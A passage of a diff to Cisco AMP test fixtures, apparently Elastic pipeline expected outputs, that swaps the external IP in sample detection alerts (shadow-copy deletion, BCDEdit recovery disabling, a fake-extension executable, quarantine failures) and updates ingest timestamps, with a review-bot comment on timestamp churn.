IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "ingested": "2021-12-09T13:35:29.222460200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -896,7 +896,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -951,7 +951,7 @@ "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
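Review bot: Every `event.ingested` value in this fixture was rewritten along with the IP (for example `"ingested": "2021-09-30T00:13:59.322436881Z"` → `"ingested": "2021-12-09T13:35:29.222460200Z"` in this hunk), so the diff carries one churned timestamp per event that has nothing to do with the `8.8.8.8` → `81.2.69.144` change being reviewed. If elastic-package does not already normalize that field, consider listing it under `dynamic_fields` in the data stream's pipeline test config (e.g. `dynamic_fields: { "event.ingested": ".*" }`) so regenerated expected files only change where the pipeline output actually changed. The IP substitution itself is applied consistently to `computer.external_ip`, `related.ip` and the embedded `event.original` string here, which is what keeps the three views of the same event in agreement; presumably the address was picked because the test GeoIP database used by the pipeline tests has an entry for it, so it is worth a short comment in the test config noting that these are test-database addresses rather than RFC 5737 documentation ranges, to stop a later cleanup from swapping them again.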
@@ -961,8 +961,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322439389Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "ingested": "2021-12-09T13:35:29.222464300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:04:56.000Z", @@ -983,7 +983,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1038,7 +1038,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1048,8 +1048,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322441669Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", + "ingested": "2021-12-09T13:35:29.222469Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. 
In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:04:49.000Z", @@ -1070,7 +1070,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1125,7 +1125,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1135,8 +1135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322443929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", + "ingested": "2021-12-09T13:35:29.222474300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:03:40.000Z", @@ -1158,7 +1158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1206,7 +1206,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1216,8 +1216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322446200Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222479200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1234,7 +1234,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1279,7 +1279,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1289,8 +1289,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322448420Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222483300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1307,7 +1307,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1352,7 +1352,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1362,8 +1362,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322450805Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", + "ingested": "2021-12-09T13:35:29.222488100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1380,7 +1380,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Unknown", @@ -1425,7 +1425,7 @@ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1435,8 +1435,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322453046Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not 